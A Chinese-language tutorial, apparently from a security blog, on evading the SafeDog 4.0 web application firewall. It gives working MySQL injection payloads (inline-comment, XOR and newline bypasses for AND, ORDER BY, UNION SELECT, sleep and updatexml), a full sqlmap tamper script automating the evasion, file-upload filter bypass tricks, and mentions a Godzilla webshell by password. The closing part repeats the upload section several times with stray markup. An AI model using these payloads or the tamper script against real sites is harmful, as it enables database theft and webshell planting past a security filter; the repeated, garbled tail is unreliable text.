绕过安全狗注入与上传的全面指南<\/h1>

知识点介绍<\/h2>

1. 内联注释绕过<\/h3>

MySQL语法中有三种注释方法：<\/p>

--<\/code> 和 #<\/code>（单行注释）<\/li>

\/* *\/<\/code>（多行注释）<\/li>
<\/ul>
特殊用法：在\/*<\/code>后加惊叹号!<\/code>表示\/* *\/<\/code>里的语句将被执行。MySQL为了保持兼容，把特有语句放在\/*!....*\/<\/code>中，在其他数据库中不会执行但在MySQL中会执行。<\/p>
示例：\/*!50001 select * from test *\/<\/code>，50001表示数据库是5.00.01及以上版本时才会执行。<\/p>
2. 异或绕过<\/h3>
当^<\/code>未被过滤时可利用：<\/p>

异或运算符：xor<\/code>或^<\/code><\/li>
逻辑运算规则：同假异真（两个条件结果相同为假，不同为真）<\/li>
<\/ul>
示例：<\/p>
lucy' Xor '<\/span>1<\/span>'='<\/span>1<\/span>' #
<\/span><\/span><\/span><\/code><\/pre>
如果'lucy'存在则前后都为真，返回假<\/li>
如果'lucy'不存在则前为假后为真，返回真<\/li>
<\/ul>
3. 换行绕过<\/h3>
使用换行符绕过：<\/p>

%23%0a<\/code>、%2d%2d%0a<\/code><\/li>
%23<\/code>是#<\/code>（MySQL行注释符）<\/li>
%0A<\/code>是换行符<\/li>
<\/ul>
示例：%23 aaaa<\/code>相当于#aaaa<\/code>（注释掉这行），加上%0a<\/code>后后面的语句能执行。<\/p>
测试环境<\/h2>

Apache + 安全狗版本4.0.28330<\/li>
Windows 10<\/li>
Pikachu靶场（字符型注入测试）<\/li>
<\/ul>
MySQL注入绕过测试<\/h2>
1. AND 1绕过<\/h3>
and 1<\/code>被拦截，使用内联注释：<\/p>
lucy' \/*!11440AND*\/ '<\/span>1<\/span>'='<\/span>1<\/span>'#
<\/span><\/span><\/span><\/code><\/pre>也可用&<\/code>或Xor<\/code>代替AND<\/code>：<\/p>
lucy' & '<\/span>1<\/span>'='<\/span>1<\/span>'#
<\/span><\/span><\/span>lucy'<\/span> Xor '1'<\/span>=<\/span>'1'<\/span>#<\/span>
<\/span><\/span><\/code><\/pre>2. ORDER BY绕过<\/h3>
order by<\/code>被拦截，使用内联注释：<\/p>
lucy' order\/*!77777cz*\/by 1#
<\/span><\/span><\/span><\/code><\/pre>可用的版本号范围：<\/p>

10440–10449<\/li>
13440-13449<\/li>
14400-14499<\/li>
15440-15449<\/li>
16440-16449<\/li>
17440-17449<\/li>
18440-18449<\/li>
<\/ul>
3. UNION SELECT绕过<\/h3>
union select<\/code>被拦截，使用内联注释：<\/p>
-<\/span>1<\/span>' union \/*!11440 select*\/ 1,2#
<\/span><\/span><\/span><\/code><\/pre>或：<\/p>
-<\/span>1<\/span>' union \/!77777cz\/\/!77777cz\/ select 1,2#
<\/span><\/span><\/span><\/code><\/pre>4. 函数绕过<\/h3>
user()<\/code>、database()<\/code>被拦截，使用内联注释：<\/p>
-<\/span>1<\/span>' union \/*!77777cz*\/\/*!77777cz*\/ select database\/*!77777a*\/(),2#
<\/span><\/span><\/span><\/code><\/pre>MySQL空白字符：%09,%0a,%0b,%0c,%0d,%20,%a0<\/code><\/p>
5. SELECT FROM绕过<\/h3>
select xxx from xxx<\/code>被拦截，使用内联注释：<\/p>
-<\/span>1<\/span>' union \/*!11440select*\/ group_concat(table_name),2 from information_schema.tables where table_schema=database\/*!77777cz*\/()#
<\/span><\/span><\/span><\/code><\/pre>或使用MySQL 5.6+新特性表：<\/p>
1<\/span>' union \/*!11440select*\/ group_concat(table_name),2 from mysql.innodb_index_stats where database_name=database\/*!()*\/#
<\/span><\/span><\/span><\/code><\/pre>6. 时间盲注和报错注入<\/h3>

sleep()<\/code>不被拦但sleep(3)<\/code>被拦：<\/li>
<\/ul>
lucy ' \/*!11440or*\/ \/*!11440sleep(3)*\/#
<\/span><\/span><\/span><\/code><\/pre>
updatexml(1,1,0)<\/code>被拦：<\/li>
<\/ul>
-<\/span>1<\/span>'AND updatexml\/*!77777cz*\/(1,version(),0)#
<\/span><\/span><\/span><\/code><\/pre>SQLMap Tamper脚本<\/h2>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>"""
<\/span><\/span><\/span>Copyright (c) 2006-2019 sqlmap developers (http:\/\/sqlmap.org\/)
<\/span><\/span><\/span>See the file 'LICENSE' for copying permission
<\/span><\/span><\/span>Author: LUSHUN
<\/span><\/span><\/span>"""<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> re
<\/span><\/span>import<\/span> os
<\/span><\/span>
<\/span><\/span>from<\/span> lib.core.data import<\/span> kb
<\/span><\/span>from<\/span> lib.core.enums import<\/span> PRIORITY
<\/span><\/span>from<\/span> lib.core.common import<\/span> singleTimeWarnMessage
<\/span><\/span>from<\/span> lib.core.enums import<\/span> DBMS
<\/span><\/span>
<\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>LOW
<\/span><\/span>
<\/span><\/span>def<\/span> dependencies<\/span>():
<\/span><\/span>    singleTimeWarnMessage("Bypass safedog4.0'<\/span>%s<\/span>' only <\/span>%s<\/span>"<\/span> %<\/span> (os.<\/span>path.<\/span>basename(__file__).<\/span>split("."<\/span>)[0<\/span>], DBMS.<\/span>MYSQL))
<\/span><\/span>
<\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs):
<\/span><\/span>        payload=<\/span>payload.<\/span>replace('AND'<\/span>,'\/*!11440AND*\/'<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace('ORDER'<\/span>,'order\/*!77777cz*\/'<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("SELECT"<\/span>,"\/*!11440SELECT*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("SLEEP("<\/span>,"sleep\/*!77777cz*\/("<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("UPDATEXML("<\/span>,"UPDATEXML\/*!77777cz*\/("<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("SESSION_USER()"<\/span>,"\/*!11440SESSION_USER()*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("USER())"<\/span>,"USER\/*!77777cz*\/())"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("DATABASE()"<\/span>,"DATABASE\/*!77777cz*\/()"<\/span>)
<\/span><\/span>        return<\/span> payload
<\/span><\/span><\/code><\/pre>使用SQLMap时需加--random-agent<\/code>参数。<\/p>
绕过上传测试<\/h2>
安全狗使用黑名单限制上传。<\/p>
方法一：等号绕过<\/h3>
在filename后多添加两个等号。<\/p>
方法二：换行绕过<\/h3>
在文件后缀名处换行。<\/p>
方法三：填充垃圾字符<\/h3>
在Content-Disposition<\/code>字段后添加垃圾数据绕过文件名校验。<\/p>
注意：安全狗对Content-Type<\/code>也有检测限制。<\/p>
免杀技术<\/h2>
提供一个哥斯拉免杀PHP马：<\/p>

密码：lushuntest<\/li>
加密器：XOR<\/li>
<\/ul>
（注：具体免杀马代码因安全原因不在此展示）<\/p>
总结<\/h2>
本文详细介绍了绕过安全狗的各种技术，包括：<\/p>

MySQL注入绕过（AND、ORDER BY、UNION SELECT等）<\/li>
上传绕过（等号、换行、垃圾字符）<\/li>
免杀技术<\/li>
自动化SQLMap Tamper脚本<\/li>
<\/ol>
这些技术主要针对安全狗4.0.28330版本，实际使用时可能需要根据目标环境进行调整。<\/p>

绕过安全狗注入与上传的全面指南<\/h1>

知识点介绍<\/h2>

MySQL注入绕过测试<\/h2>

方法一：等号绕过<\/h3> 在filename后多添加两个等号。<\/p>

方法二：换行绕过<\/h3> 在文件后缀名处换行。<\/p>

方法三：填充垃圾字符<\/h3> 在Content-Disposition<\/code>字段后添加垃圾数据绕过文件名校验。<\/p> 注意：安全狗对Content-Type<\/code>也有检测限制。<\/p>

方法一：等号绕过<\/h3>
在filename后多添加两个等号。<\/p>

方法二：换行绕过<\/h3>
在文件后缀名处换行。<\/p>

方法三：填充垃圾字符<\/h3>
在`Content-Disposition<\/code>字段后添加垃圾数据绕过文件名校验。<\/p>`
`注意：安全狗对Content-Type<\/code>也有检测限制。<\/p>`